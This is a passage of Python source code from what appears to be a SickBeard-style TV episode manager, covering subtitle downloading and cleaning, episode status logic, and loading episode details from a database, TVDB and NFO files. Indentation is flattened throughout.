sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND location != ''", [self.tvdbid])
for ep in sqlResults:
curLoc = os.path.normpath(ep["location"])
season = int(ep["season"])
episode = int(ep["episode"])
try:
curEp = self.getEpisode(season, episode)
except exceptions.EpisodeDeletedException:
logger.log(u"The episode was deleted while we were refreshing it, moving on to the next one", logger.DEBUG)
continue
# if the path doesn't exist or if it's not in our show dir
if not ek.ek(os.path.isfile, curLoc) or not os.path.normpath(curLoc).startswith(os.path.normpath(self.location)):
with curEp.lock:
# if it used to have a file associated with it and it doesn't anymore then set it to IGNORED
if curEp.location and curEp.status in Quality.DOWNLOADED:
logger.log(str(self.tvdbid) + ": Location for " + str(season) + "x" + str(episode) + " doesn't exist, removing it and changing our status to IGNORED", logger.DEBUG)
curEp.status = IGNORED
curEp.subtitles = list()
curEp.subtitles_searchcount = 0
curEp.subtitles_lastsearch = str(datetime.datetime.min)
curEp.location = ''
curEp.hasnfo = False
curEp.hastbn = False
curEp.release_name = ''
curEp.saveToDB()
def downloadSubtitles(self):
#TODO: Add support for force option
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, can't download subtitles", logger.DEBUG)
return
logger.log(str(self.tvdbid) + ": Downloading subtitles", logger.DEBUG)
try:
episodes = db.DBConnection().select("SELECT location FROM tv_episodes WHERE showid = ? AND location NOT LIKE '' ORDER BY season DESC, episode DESC", [self.tvdbid])
for episodeLoc in episodes:
episode = self.makeEpFromFile(episodeLoc['location']);
subtitles = episode.downloadSubtitles()
except Exception as e:
logger.log("Error occurred when downloading subtitles: " + str(e), logger.DEBUG)
return
def cleanSubtitles(self):
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, can't clean subtitles", logger.DEBUG)
return
logger.log(str(self.tvdbid) + ": Cleaning subtitles", logger.DEBUG)
try:
episodes = db.DBConnection().select("SELECT location FROM tv_episodes WHERE showid = ? AND location NOT LIKE '' ORDER BY season DESC, episode DESC", [self.tvdbid])
for episodeLoc in episodes:
episode = self.makeEpFromFile(episodeLoc['location']);
subtitles = episode.cleanSubtitles()
except Exception as e:
logger.log("Error occurred when cleaning subtitles: " + str(e), logger.DEBUG)
return
def searchFrench(self, show):
logger.log("Sending french episodes search")
FrenchFinder('force',show)
return
def saveToDB(self):
logger.log(str(self.tvdbid) + ": Saving show info to database", logger.DEBUG)
myDB = db.DBConnection()
controlValueDict = {"tvdb_id": self.tvdbid}
newValueDict = {"show_name": self.name,
"tvr_id": self.tvrid,
"location": self._location,
"network": self.network,
"genre": self.genre,
"runtime": self.runtime,
"quality": self.quality,
"airs": self.airs,
"status": self.status,
"flatten_folders": self.flatten_folders,
"frenchsearch":self.frenchsearch,
"paused": self.paused,
"air_by_date": self.air_by_date,
"subtitles": self.subtitles,
"startyear": self.startyear,
"tvr_name": self.tvrname,
"lang": self.lang,
"imdb_id": self.imdbid,
"audio_lang": self.audio_lang
}
myDB.upsert("tv_shows", newValueDict, controlValueDict)
if self.imdbid:
controlValueDict = {"tvdb_id": self.tvdbid}
newValueDict = self.imdb_info
myDB.upsert("imdb_info", newValueDict, controlValueDict)
def __str__(self):
toReturn = ""
toReturn += "name: " + self.name + "\n"
toReturn += "location: " + self._location + "\n"
toReturn += "tvdbid: " + str(self.tvdbid) + "\n"
if self.network != None:
toReturn += "network: " + self.network + "\n"
if self.airs != None:
toReturn += "airs: " + self.airs + "\n"
if self.status != None:
toReturn += "status: " + self.status + "\n"
toReturn += "startyear: " + str(self.startyear) + "\n"
toReturn += "genre: " + self.genre + "\n"
toReturn += "runtime: " + str(self.runtime) + "\n"
toReturn += "quality: " + str(self.quality) + "\n"
return toReturn
def wantEpisode(self, season, episode, quality, manualSearch=False):
logger.log(u"Checking if we want episode "+str(season)+"x"+str(episode)+" at quality "+Quality.qualityStrings[quality], logger.DEBUG)
# if the quality isn't one we want under any circumstances then just say no
anyQualities, bestQualities = Quality.splitQuality(self.quality)
logger.log(u"any,best = "+str(anyQualities)+" "+str(bestQualities)+" and we are "+str(quality), logger.DEBUG)
if quality not in anyQualities + bestQualities:
logger.log(u"I know for sure I don't want this episode, saying no", logger.DEBUG)
return False
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT status FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?", [self.tvdbid, season, episode])
if not sqlResults or not len(sqlResults):
logger.log(u"Unable to find the episode", logger.DEBUG)
return False
epStatus = int(sqlResults[0]["status"])
logger.log(u"current episode status: "+str(epStatus), logger.DEBUG)
# if we know we don't want it then just say no
if epStatus in (SKIPPED, IGNORED, ARCHIVED) and not manualSearch:
logger.log(u"Ep is skipped, not bothering", logger.DEBUG)
return False
# if it's one of these then we want it as long as it's in our allowed initial qualities
if quality in anyQualities + bestQualities:
if epStatus in (WANTED, UNAIRED, SKIPPED):
logger.log(u"Ep is wanted/unaired/skipped, definitely get it", logger.DEBUG)
return True
elif manualSearch:
logger.log(u"Usually I would ignore this ep but because you forced the search I'm overriding the default and allowing the quality", logger.DEBUG)
return True
else:
logger.log(u"This quality looks like something we might want but I don't know for sure yet", logger.DEBUG)
curStatus, curQuality = Quality.splitCompositeStatus(epStatus)
# if we are re-downloading then we only want it if it's in our bestQualities list and better than what we have
if curStatus in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.SNATCHED_FRENCH and quality in bestQualities and quality > curQuality:
logger.log(u"We already have this ep but the new one is better quality, saying yes", logger.DEBUG)
return True
logger.log(u"None of the conditions were met so I'm just saying no", logger.DEBUG)
return False
def getOverview(self, epStatus):
if epStatus == WANTED:
return Overview.WANTED
elif epStatus in (UNAIRED, UNKNOWN):
return Overview.UNAIRED
elif epStatus in (SKIPPED, IGNORED):
return Overview.SKIPPED
elif epStatus == ARCHIVED:
return Overview.GOOD
elif epStatus in Quality.DOWNLOADED + Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.SNATCHED_FRENCH:
anyQualities, bestQualities = Quality.splitQuality(self.quality) #@UnusedVariable
if bestQualities:
maxBestQuality = max(bestQualities)
else:
maxBestQuality = None
epStatus, curQuality = Quality.splitCompositeStatus(epStatus)
if epStatus in (SNATCHED, SNATCHED_PROPER, SNATCHED_FRENCH):
return Overview.SNATCHED
# if they don't want re-downloads then we call it good if they have anything
elif maxBestQuality == None:
return Overview.GOOD
# if they have one but it's not the best they want then mark it as qual
elif curQuality < maxBestQuality:
return Overview.QUAL
# if it's >= maxBestQuality then it's good
else:
return Overview.GOOD
def dirty_setter(attr_name):
def wrapper(self, val):
if getattr(self, attr_name) != val:
setattr(self, attr_name, val)
self.dirty = True
return wrapper
class TVEpisode(object):
def __init__(self, show, season, episode, file="", scene=False):
self._name = ""
self._season = season
self._episode = episode
self._description = ""
self._subtitles = list()
self._subtitles_searchcount = 0
self._subtitles_lastsearch = str(datetime.datetime.min)
self._airdate = datetime.date.fromordinal(1)
self._hasnfo = False
self._hastbn = False
self._status = UNKNOWN
self._tvdbid = 0
self._file_size = 0
self._audio_langs = ''
self._release_name = ''
self.scene = scene
self._scene_season = None
self._scene_episode = None
if self.scene:
self._scene_season = self._season
self._scene_episode = self._episode
# setting any of the above sets the dirty flag
self.dirty = True
self.show = show
self._location = file
self.lock = threading.Lock()
self.relatedEps = []
self.specifyEpisode(self.season, self.episode)
self.checkForMetaFiles()
name = property(lambda self: self._name, dirty_setter("_name"))
season = property(lambda self: self._season, dirty_setter("_season"))
episode = property(lambda self: self._episode, dirty_setter("_episode"))
description = property(lambda self: self._description, dirty_setter("_description"))
subtitles = property(lambda self: self._subtitles, dirty_setter("_subtitles"))
subtitles_searchcount = property(lambda self: self._subtitles_searchcount, dirty_setter("_subtitles_searchcount"))
subtitles_lastsearch = property(lambda self: self._subtitles_lastsearch, dirty_setter("_subtitles_lastsearch"))
airdate = property(lambda self: self._airdate, dirty_setter("_airdate"))
hasnfo = property(lambda self: self._hasnfo, dirty_setter("_hasnfo"))
hastbn = property(lambda self: self._hastbn, dirty_setter("_hastbn"))
status = property(lambda self: self._status, dirty_setter("_status"))
tvdbid = property(lambda self: self._tvdbid, dirty_setter("_tvdbid"))
#location = property(lambda self: self._location, dirty_setter("_location"))
file_size = property(lambda self: self._file_size, dirty_setter("_file_size"))
audio_langs = property(lambda self: self._audio_langs, dirty_setter("_audio_langs"))
release_name = property(lambda self: self._release_name, dirty_setter("_release_name"))
scene_season = property(lambda self: self._getSceneOrTVDBSeason(), dirty_setter("_scene_season"))
scene_episode = property(lambda self: self._getSceneOrTVDBEpisode(), dirty_setter("_scene_episode"))
def _getSceneOrTVDBSeason(self):
if self._scene_season is None:
return self.season
else:
return self._scene_season
def _getSceneOrTVDBEpisode(self):
if self._scene_episode is None:
return self.episode
else:
return self._scene_episode
def _set_location(self, new_location):
logger.log(u"Setter sets location to " + new_location, logger.DEBUG)
#self._location = newLocation
dirty_setter("_location")(self, new_location)
if new_location and ek.ek(os.path.isfile, new_location):
self.file_size = ek.ek(os.path.getsize, new_location)
else:
self.file_size = 0
location = property(lambda self: self._location, _set_location)
def refreshSubtitles(self):
"""Look for subtitles files and refresh the subtitles property"""
self.subtitles = subtitles.subtitlesLanguages(self.location)
def downloadSubtitles(self):
#TODO: Add support for force option
if not ek.ek(os.path.isfile, self.location):
logger.log(str(self.show.tvdbid) + ": Episode file doesn't exist, can't download subtitles for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
return
logger.log(str(self.show.tvdbid) + ": Downloading subtitles for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
previous_subtitles = self.subtitles
try:
need_languages = set(sickbeard.SUBTITLES_LANGUAGES) - set(self.subtitles)
subtitles = subliminal.download_subtitles([self.location], languages=need_languages, services=sickbeard.subtitles.getEnabledServiceList(), force=False, multi=True, cache_dir=sickbeard.CACHE_DIR)
except Exception as e:
logger.log("Error occurred when downloading subtitles: " + str(e), logger.DEBUG)
return
self.refreshSubtitles()
self.subtitles_searchcount = self.subtitles_searchcount + 1 if self.subtitles_searchcount else 1 #added the if because sometime it raise an error
self.subtitles_lastsearch = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
self.saveToDB()
newsubtitles = set(self.subtitles).difference(set(previous_subtitles))
if newsubtitles:
subtitleList = ", ".join(subliminal.language.Language(x).name for x in newsubtitles)
logger.log(str(self.show.tvdbid) + ": Downloaded " + subtitleList + " subtitles for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
notifiers.notify_subtitle_download(self.prettyName(), subtitleList)
else:
logger.log(str(self.show.tvdbid) + ": No subtitles downloaded for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
if newsubtitles and (sickbeard.SUBTITLES_CLEAN_HI or sickbeard.SUBTITLES_CLEAN_TEAM or sickbeard.SUBTITLES_CLEAN_MUSIC or sickbeard.SUBTITLES_CLEAN_PUNC):
logger.log("TIDYSUB: Try to clean sub", logger.DEBUG)
for video in subtitles:
for subtitle in subtitles.get(video):
sub = cleaner.TidySub(subtitle.path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
if sickbeard.SUBTITLES_HISTORY:
for video in subtitles:
for subtitle in subtitles.get(video):
history.logSubtitle(self.show.tvdbid, self.season, self.episode, self.status, subtitle)
if sickbeard.SUBTITLES_DIR:
for video in subtitles:
subs_new_path = ek.ek(os.path.join, os.path.dirname(video.path), sickbeard.SUBTITLES_DIR)
if not ek.ek(os.path.isdir, subs_new_path):
ek.ek(os.mkdir, subs_new_path)
for subtitle in subtitles.get(video):
new_file_path = ek.ek(os.path.join, subs_new_path, os.path.basename(subtitle.path))
helpers.moveFile(subtitle.path, new_file_path)
if sickbeard.SUBSNOLANG:
helpers.copyFile(new_file_path,new_file_path[:-6]+"srt")
elif sickbeard.SUBTITLES_DIR_SUB:
for video in subtitles:
subs_new_path = os.path.join(os.path.dirname(video.path), "Subs")
if not os.path.isdir(subs_new_path):
os.makedirs(subs_new_path)
for subtitle in subtitles.get(video):
new_file_path = ek.ek(os.path.join, subs_new_path, os.path.basename(subtitle.path))
helpers.moveFile(subtitle.path, new_file_path)
subtitle.path=new_file_path
if sickbeard.SUBSNOLANG:
helpers.copyFile(new_file_path,new_file_path[:-6]+"srt")
subtitle.path=new_file_path
else:
for video in subtitles:
for subtitle in subtitles.get(video):
if sickbeard.SUBSNOLANG:
helpers.copyFile(subtitle.path,subtitle.path[:-6]+"srt")
helpers.chmodAsParent(subtitle.path[:-6]+"srt")
helpers.chmodAsParent(subtitle.path)
return subtitles
def cleanSubtitles(self):
if not ek.ek(os.path.isfile, self.location):
logger.log(str(self.show.tvdbid) + ": Episode file doesn't exist, can't clean subtitles for episode " + str(self.season) + "x" + str(self.episode), logger.DEBUG)
return
logger.log(str(self.show.tvdbid) + ": Cleaning subtitles for episode " + str(self.season) + "x" + str(self.episode))
self.refreshSubtitles()
subtitles = set(self.subtitles)
if subtitles and (sickbeard.SUBTITLES_CLEAN_HI or sickbeard.SUBTITLES_CLEAN_TEAM or sickbeard.SUBTITLES_CLEAN_MUSIC or sickbeard.SUBTITLES_CLEAN_PUNC):
logger.log("TIDYSUB: Try to clean sub", logger.DEBUG)
if sickbeard.SUBTITLES_DIR_SUB:
if sickbeard.SUBSNOLANG:
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(self.location),"Subs"), self.formatted_filename()+".srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(self.location),"Subs"), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
else:
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(self.location),"Subs"), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
elif sickbeard.SUBTITLES_DIR:
if sickbeard.SUBSNOLANG:
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(sickbeard.SUBTITLES_DIR),"Subs"), self.formatted_filename()+".srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(sickbeard.SUBTITLES_DIR),"Subs"), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
else:
subtitle_path = ek.ek(os.path.join, os.path.join(os.path.dirname(sickbeard.SUBTITLES_DIR),"Subs"), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
else:
if sickbeard.SUBSNOLANG:
subtitle_path = ek.ek(os.path.join, os.path.dirname(self.location), self.formatted_filename()+".srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
subtitle_path = ek.ek(os.path.join, os.path.dirname(self.location), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
else:
subtitle_path = ek.ek(os.path.join, os.path.dirname(self.location), self.formatted_filename()+".fr.srt")
sub = cleaner.TidySub(subtitle_path)
sub.Clean(sickbeard.SUBTITLES_CLEAN_HI, sickbeard.SUBTITLES_CLEAN_TEAM, sickbeard.SUBTITLES_CLEAN_MUSIC, sickbeard.SUBTITLES_CLEAN_PUNC)
return subtitles
def checkForMetaFiles(self):
oldhasnfo = self.hasnfo
oldhastbn = self.hastbn
cur_nfo = False
cur_tbn = False
# check for nfo and tbn
if ek.ek(os.path.isfile, self.location):
for cur_provider in sickbeard.metadata_provider_dict.values():
if cur_provider.episode_metadata:
new_result = cur_provider._has_episode_metadata(self)
else:
new_result = False
cur_nfo = new_result or cur_nfo
if cur_provider.episode_thumbnails:
new_result = cur_provider._has_episode_thumb(self)
else:
new_result = False
cur_tbn = new_result or cur_tbn
self.hasnfo = cur_nfo
self.hastbn = cur_tbn
# if either setting has changed return true, if not return false
return oldhasnfo != self.hasnfo or oldhastbn != self.hastbn
def specifyEpisode(self, season, episode):
sqlResult = self.loadFromDB(season, episode)
# we need this because if the db loading is done with scene we change the acctuay ep ans season number
# and these numbers are not valid any more and have been replaced with tvdb numbers
if sqlResult:
season = self.season
episode = self.episode
if not sqlResult:
# only load from NFO if we didn't load from DB
if ek.ek(os.path.isfile, self.location):
try:
self.loadFromNFO(self.location)
except exceptions.NoNFOException:
logger.log(str(self.show.tvdbid) + ": There was an error loading the NFO for episode " + str(season) + "x" + str(episode), logger.ERROR)
pass
# if we tried loading it from NFO and didn't find the NFO, use TVDB
if self.hasnfo == False:
try:
result = self.loadFromTVDB(season, episode)
except exceptions.EpisodeDeletedException:
result = False
# if we failed SQL *and* NFO, TVDB then fail
if result == False:
raise exceptions.EpisodeNotFoundException("Couldn't find episode " + str(season) + "x" + str(episode))
# don't update if not needed
if self.dirty:
self.saveToDB()
def loadFromDB(self, season, episode):
msg = ''
if self.scene:
msg = "(mode: scene numbers)"
logger.log(str(self.show.tvdbid) + ": Loading episode details from DB for episode " + msg + " " + str(season) + "x" + str(episode), logger.DEBUG)
myDB = db.DBConnection()
if not self.scene:
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND season = ? AND episode = ?", [self.show.tvdbid, season, episode])
else:
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND scene_season = ? AND scene_episode = ?", [self.show.tvdbid, season, episode])
if len(sqlResults) > 1 and not self.scene:
raise exceptions.MultipleDBEpisodesException("Your DB has two records for the same episode somehow."+msg)
elif len(sqlResults) > 1 and self.scene:
first = True
for relatedEP in sqlResults:
if first: # first shal be root ep
first = False
continue
logger.log(str(self.show.tvdbid) + ": Adding a related episode because of a scene mapping with tvdb numbers " + str(relatedEP["season"]) + "x" + str(relatedEP["episode"]), logger.DEBUG)
rel_ep_obj = TVEpisode(self.show, int(relatedEP["season"]), int(relatedEP["episode"]))
self.relatedEps.append(rel_ep_obj)
elif len(sqlResults) == 0:
logger.log(str(self.show.tvdbid) + ": Episode " +msg+ str(self.season) + "x" + str(self.episode) + " not found in the database", logger.DEBUG)
return False
else:
#NAMEIT logger.log(u"AAAAA from" + str(self.season)+"x"+str(self.episode) + " -" + self.name + " to " + str(sqlResults[0]["name"]))
if sqlResults[0]["name"] != None:
self.name = sqlResults[0]["name"]
if not self.scene:
self.season = season
self.episode = episode
else:
self.season = int(sqlResults[0]["season"])
self.episode = int(sqlResults[0]["episode"])
self.description = sqlResults[0]["description"]
if self.description == None:
self.description = ""
if sqlResults[0]["subtitles"] != None and sqlResults[0]["subtitles"] != '':
self.subtitles = sqlResults[0]["subtitles"].split(",")
self.subtitles_searchcount = sqlResults[0]["subtitles_searchcount"]
self.subtitles_lastsearch = sqlResults[0]["subtitles_lastsearch"]
self.airdate = datetime.date.fromordinal(int(sqlResults[0]["airdate"]))
#logger.log(u"1 Status changes from " + str(self.status) + " to " + str(sqlResults[0]["status"]), logger.DEBUG)
self.status = int(sqlResults[0]["status"])
# don't overwrite my location
if sqlResults[0]["location"] != "" and sqlResults[0]["location"] != None:
self.location = os.path.normpath(sqlResults[0]["location"])
if sqlResults[0]["file_size"]:
self.file_size = int(sqlResults[0]["file_size"])
else:
self.file_size = 0
self.tvdbid = int(sqlResults[0]["tvdbid"])
# does one now a better way to test for NULL in the db field ?
if isinstance(sqlResults[0]["scene_season"], int):
self.scene_season = int(sqlResults[0]["scene_season"])
if isinstance(sqlResults[0]["scene_episode"], int):
self.scene_episode = int(sqlResults[0]["scene_episode"])
logger.log("Episode loading done " + msg + str(self.season) + "x" + str(self.episode), logger.DEBUG)
self.scene = False
if sqlResults[0]["audio_langs"] != None:
self.audio_langs = sqlResults[0]["audio_langs"]
if sqlResults[0]["release_name"] != None:
self.release_name = sqlResults[0]["release_name"]
self.dirty = False
return True
def loadFromTVDB(self, season=None, episode=None, cache=True, tvapi=None, cachedSeason=None):
if season == None:
season = self.season
if episode == None:
episode = self.episode
logger.log(str(self.show.tvdbid) + ": Loading episode details from theTVDB for episode " + str(season) + "x" + str(episode), logger.DEBUG)
tvdb_lang = self.show.lang
try:
if cachedSeason is None:
if tvapi is None:
# There's gotta be a better way of doing this but we don't wanna
# change the cache value elsewhere
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if not cache:
ltvdb_api_parms['cache'] = False
if tvdb_lang:
ltvdb_api_parms['language'] = tvdb_lang
t = tvdb_api.Tvdb(**ltvdb_api_parms)
else:
t = tvapi
myEp = t[self.show.tvdbid][season][episode]
else:
myEp = cachedSeason[episode]
except (tvdb_exceptions.tvdb_error, IOError), e:
logger.log(u"TVDB threw up an error: "+ex(e), logger.DEBUG)
# if the episode is already valid just log it, if not throw it up
if self.name:
logger.log(u"TVDB timed out but we have enough info from other sources, allowing the error", logger.DEBUG)
return
else:
logger.log(u"TVDB timed out, unable to create the episode", logger.ERROR)
return False
except (tvdb_exceptions.tvdb_episodenotfound, tvdb_exceptions.tvdb_seasonnotfound):
logger.log(u"Unable to find the episode on tvdb... has it been removed? Should I delete from db?", logger.DEBUG)
# if I'm no longer on TVDB but I once was then delete myself from the DB
if self.tvdbid != -1:
self.deleteEpisode()
return
if not myEp["firstaired"] or myEp["firstaired"] == "0000-00-00":
myEp["firstaired"] = str(datetime.date.fromordinal(1))
if myEp["episodename"] == None or myEp["episodename"] == "":
logger.log(u"This episode ("+self.show.name+" - "+str(season)+"x"+str(episode)+") has no name on TVDB")
# if I'm incomplete on TVDB but I once was complete then just delete myself from the DB for now
if self.tvdbid != -1:
self.deleteEpisode()
return False
#NAMEIT logger.log(u"BBBBBBBB from " + str(self.season)+"x"+str(self.episode) + " -" +self.name+" to "+myEp["episodename"])
self.name = myEp["episodename"]
self.season = season
self.episode = episode
tmp_description = myEp["overview"]
if tmp_description == None:
self.description = ""
else:
self.description = tmp_description
rawAirdate = [int(x) for x in myEp["firstaired"].split("-")]
try:
self.airdate = datetime.date(rawAirdate[0], rawAirdate[1], rawAirdate[2])
except ValueError:
logger.log(u"Malformed air date retrieved from TVDB ("+self.show.name+" - "+str(season)+"x"+str(episode)+")", logger.ERROR)
# if I'm incomplete on TVDB but I once was complete then just delete myself from the DB for now
if self.tvdbid != -1:
self.deleteEpisode()
return False
#early conversion to int so that episode doesn't get marked dirty
self.tvdbid = int(myEp["id"])
#don't update show status if show dir is missing, unless missing show dirs are created during post-processing
if not ek.ek(os.path.isdir, self.show._location) and not sickbeard.CREATE_MISSING_SHOW_DIRS:
logger.log(u"The show dir is missing, not bothering to change the episode statuses since it'd probably be invalid")
return
logger.log(str(self.show.tvdbid) + ": Setting status for " + str(season) + "x" + str(episode) + " based on status " + str(self.status) + " and existence of " + self.location, logger.DEBUG)
if not ek.ek(os.path.isfile, self.location):
# if we don't have the file
if self.airdate >= datetime.date.today() and self.status not in Quality.SNATCHED + Quality.SNATCHED_PROPER + Quality.SNATCHED_FRENCH:
# and it hasn't aired yet set the status to UNAIRED
logger.log(u"Episode airs in the future, changing status from " + str(self.status) + " to " + str(UNAIRED), logger.DEBUG)
self.status = UNAIRED
# if there's no airdate then set it to skipped (and respect ignored)
elif self.airdate == datetime.date.fromordinal(1):
if self.status == IGNORED:
logger.log(u"Episode has no air date, but it's already marked as ignored", logger.DEBUG)
else:
logger.log(u"Episode has no air date, automatically marking it skipped", logger.DEBUG)
self.status = SKIPPED
# if we don't have the file and the airdate is in the past
else:
if self.status == UNAIRED:
self.status = WANTED
# if we somehow are still UNKNOWN then just skip it
elif self.status == UNKNOWN:
self.status = SKIPPED
else:
logger.log(u"Not touching status because we have no ep file, the airdate is in the past, and the status is "+str(self.status), logger.DEBUG)
# if we have a media file then it's downloaded
elif sickbeard.helpers.isMediaFile(self.location):
# leave propers alone, you have to either post-process them or manually change them back
if self.status not in Quality.SNATCHED_FRENCH + Quality.SNATCHED_PROPER + Quality.DOWNLOADED + Quality.SNATCHED + [ARCHIVED]:
logger.log(u"5 Status changes from " + str(self.status) + " to " + str(Quality.statusFromName(self.location)), logger.DEBUG)
self.status = Quality.statusFromName(self.location)
# shouldn't get here probably
else:
logger.log(u"6 Status changes from " + str(self.status) + " to " + str(UNKNOWN), logger.DEBUG)
self.status = UNKNOWN
# hasnfo, hastbn, status?
def loadFromNFO(self, location):
if not os.path.isdir(self.show._location):
logger.log(str(self.show.tvdbid) + ": The show dir is missing, not bothering to try loading the episode NFO")
return
logger.log(str(self.show.tvdbid) + ": Loading episode details from the NFO file associated with " + location, logger.DEBUG)
self.location = location
if self.location != "":
if self.status == UNKNOWN:
if sickbeard.helpers.isMediaFile(self.location):
logger.log(u"7 Status changes from " + str(self.status) + " to " + str(Quality.statusFromName(self.location)), logger.DEBUG)
self.status = Quality.statusFromName(self.location)
nfoFile = sickbeard.helpers.replaceExtension(self.location, "nfo")
logger.log(str(self.show.tvdbid) + ": Using NFO name " + nfoFile, logger.DEBUG)
if ek.ek(os.path.isfile, nfoFile):
try:
showXML = etree.ElementTree(file = nfoFile)
except (SyntaxError, ValueError), e:
logger.log(u"Error loading the NFO, backing up the NFO and skipping for now: " + ex(e), logger.ERROR) #TODO: figure out what's wrong and fix it
try:
ek.ek(os.rename, nfoFile, nfoFile + ".old")
except Exception, e:
logger.log(u"Failed to rename your episode's NFO file - you need to delete it or fix it: " + ex(e), logger.ERROR)
raise exceptions.NoNFOException("Error in NFO format")
for epDetails in showXML.getiterator('episodedetails'):
if epDetails.findtext('season') == None or int(epDetails.findtext('season')) != self.season or \
epDetails.findtext('episode') == None or int(epDetails.findtext('episode')) != self.episode:
logger.log(str(self.show.tvdbid) + ": NFO has an <episodedetails> block for a different episode - wanted " + str(self.season) + "x" + str(self.episode) + " but got " + str(epDetails.findtext('season')) + "x" + str(epDetails.findtext('episode')), logger.DEBUG)
continue
if epDetails.findtext('title') == None or epDetails.findtext('aired') == None:
raise exceptions.NoNFOException("Error in NFO format (missing episode title or airdate)")
self.name = epDetails.findtext('title')
self.episode = int(epDetails.findtext('episode'))
self.season = int(epDetails.findtext('season'))
self.description = epDetails.findtext('plot')
if self.description == None:
self.description = ""
if epDetails.findtext('aired'):
rawAirdate = [int(x) for x in epDetails.findtext('aired').split("-")]
self.airdate = datetime.date(rawAirdate[0], rawAirdate[1], rawAirdate[2])
else:
self.airdate = datetime.date.fromordinal(1)
self.hasnfo = True
else:
self.hasnfo = False
if ek.ek(os.path.isfile, sickbeard.helpers.replaceExtension(nfoFile, "tbn")):
self.hastbn = True
else:
self.hastbn = False
def __str__ (self):
toReturn = ""
toReturn += str(self.show.name) + " - " + str(self.season) + "x" + str(self.episode) + " - " + str(self.name) + "\n"
toReturn += "location: " + str(self.location) + "\n"
toReturn += "description: " + str(self.description) + "\n"
toReturn += "subtitles: " + str(",".join(self.subtitles)) + "\n"
toReturn += "subtitles_searchcount: " + str(self.subtitles_searchcount) + "\n"
toReturn += "subtitles_lastsearch: " + str(self.subtitles_lastsearch) + "\n"
toReturn += "airdate: " + str(self.airdate.toordinal()) + " (" + str(self.airdate) + ")\n"
toReturn += "hasnfo: " + str(self.hasnfo) + "\n"
toReturn += "hastbn: " + str(self.hastbn) + "\n"
toReturn += "status: " + str(self.status) + "\n"
toReturn += "languages: " + str(self.audio_langs) + "\n"
return toReturn
def createMetaFiles(self, force=False):
if not ek.ek(os.path.isdir, self.show._location):
logger.log(str(self.show.tvdbid) + ": The show dir is missing, not bothering to try to create metadata")
return
self.createNFO(force)
self.createThumbnail(force)
if self.checkForMetaFiles():
self.saveToDB()
def createNFO(self, force=False):
result = False
for cur_provider in sickbeard.metadata_provider_dict.values():
result = cur_provider.create_episode_metadata(self) or result
return result
def createThumbnail(self, force=False):
result = False
for cur_provider in sickbeard.metadata_provider_dict.values():
result = cur_provider.create_episode_thumb(self) or result
return result
def deleteEpisode(self):
logger.log(u"Deleting "+self.show.name+" "+str(self.season)+"x"+str(self.episode)+" from the DB", logger.DEBUG)
# remove myself from the show dictionary
if self.show.getEpisode(self.season, self.episode, noCreate=True) == self:
logger.log(u"Removing myself from my show's list", logger.DEBUG)
del self.show.episodes[self.season][self.episode]
# delete myself from the DB
logger.log(u"Deleting myself from the database", logger.DEBUG)
